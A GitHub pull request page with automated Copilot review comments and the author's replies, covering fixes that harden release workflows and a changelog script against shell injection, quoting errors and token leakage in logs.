fix(ci): Harden workflows against shell injection and fix quoting issues#239
fix(ci): Harden workflows against shell injection and fix quoting issues#239
Conversation
- check-release-condition.yml: Replace ${{ }} expression interpolation
in shell scripts with env-based variable passing to prevent command
injection. Strengthen version parser with anchored regex. Migrate
deprecated set-output to $GITHUB_OUTPUT. Use grep -Fq for exact
string matching in CHANGELOG check.
- update_changelog.sh: Fix typo in git-chglog command (missing space)
that broke the existing-tag code path. Add proper quoting for all
variable references.
- version-tag.yml: Suppress stderr on git remote set-url to prevent
token leakage in error logs.
Tiryoh
force-pushed
the
fix/harden-workflows-security
branch
from
c7e1979 to
0963a9d
Compare
There was a problem hiding this comment.
Pull request overview
This PR hardens the release-related GitHub Actions workflows and the changelog update script by fixing quoting issues, reducing opportunities for shell injection, and updating deprecated workflow output patterns.
Changes:
- Harden
check-release-conditionparsing/outputs (anchored version matching,$GITHUB_OUTPUT, env-based comparisons) and make the CHANGELOG check use fixed-string matching. - Fix a broken
git-chgloginvocation path and improve shell quoting inupdate_changelog.sh. - Update
version-tagworkflow to reduce the chance of token leakage in error logs.
Reviewed changes
Copilot reviewed 3 out of 3 changed files in this pull request and generated 2 comments.
| File | Description |
|---|---|
| .github/workflows/version-tag.yml | Adds job gating and suppresses stderr for remote URL update when pushing major/minor tags. |
| .github/workflows/check-release-condition.yml | Tightens release title parsing, migrates from set-output to $GITHUB_OUTPUT, and hardens comparisons/grep usage. |
| .github/scripts/update_changelog.sh | Fixes git-chglog command typo and adds consistent variable quoting. |
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
| runs-on: ubuntu-latest | ||
| if: github.actor == github.repository_owner |
There was a problem hiding this comment.
The new job-level condition if: github.actor == github.repository_owner is a behavior change that will skip this workflow for tag pushes made by non-owner maintainers or automation (e.g., github-actions[bot]). If major/minor tag updates are expected to run for tag pushes created by CI or by collaborators with tag permissions, consider broadening/adjusting the condition (or documenting why only the repository owner should be allowed).
There was a problem hiding this comment.
This is intentional. In this repository, only the repository owner pushes version tags. The same restriction pattern is already applied to the release-candidate workflow.
| - name: tag | ||
| run: | | ||
| git remote set-url origin https://${{ secrets.GITHUB_TOKEN }}@github.com/${GITHUB_REPOSITORY}.git | ||
| git remote set-url origin "https://${{ secrets.GITHUB_TOKEN }}@github.com/${GITHUB_REPOSITORY}.git" 2>/dev/null |
There was a problem hiding this comment.
Redirecting git remote set-url stderr to /dev/null prevents potential token leakage, but it also removes actionable diagnostics if the command fails (the step will just error with no context). A safer approach is to avoid embedding the token in the remote URL at all (actions/checkout typically already configures authenticated remotes), or capture stderr and re-emit a sanitized failure message without the URL/token.
| git remote set-url origin "https://${{ secrets.GITHUB_TOKEN }}@github.com/${GITHUB_REPOSITORY}.git" 2>/dev/null |
There was a problem hiding this comment.
Removed the stderr suppression. GITHUB_TOKEN is scoped to the job and expires on completion, so token leakage in error logs is not a practical risk. Keeping diagnostic output is more valuable.
Summary
${{ }}expression interpolation in shell scripts with env-based variable passing. Strengthen the version parser with anchored regex (^...$). Migrate deprecatedset-outputto$GITHUB_OUTPUT. Usegrep -Fqfor exact fixed-string matching in the CHANGELOG check.git-chglogcommand (missing space on L18) that broke the existing-tag regeneration path. Add proper quoting for all variable references.git remote set-urlto prevent token leakage in error logs.Backward compatibility verification
All 18 historical release PR titles (from
release v0.8.0throughrelease: v0.25.0) were tested against both the old and new grep/sed patterns. Every title produces identical PASS results with both patterns, confirming no regression in version parsing.Other changes are strictly safe:
set-output→$GITHUB_OUTPUT: Standard migration,set-outputis already deprecated by GitHub.release-candidate.yaml.grep -Fq: Stricter (fixed-string) matching only eliminates false positives.git-chglogtypo fix: Restores a broken code path (existing-tag regeneration).Test plan
release: v0.25.0and verify the check-release-condition workflow passesupdate_changelog.shruns without errors in the release-candidate workflow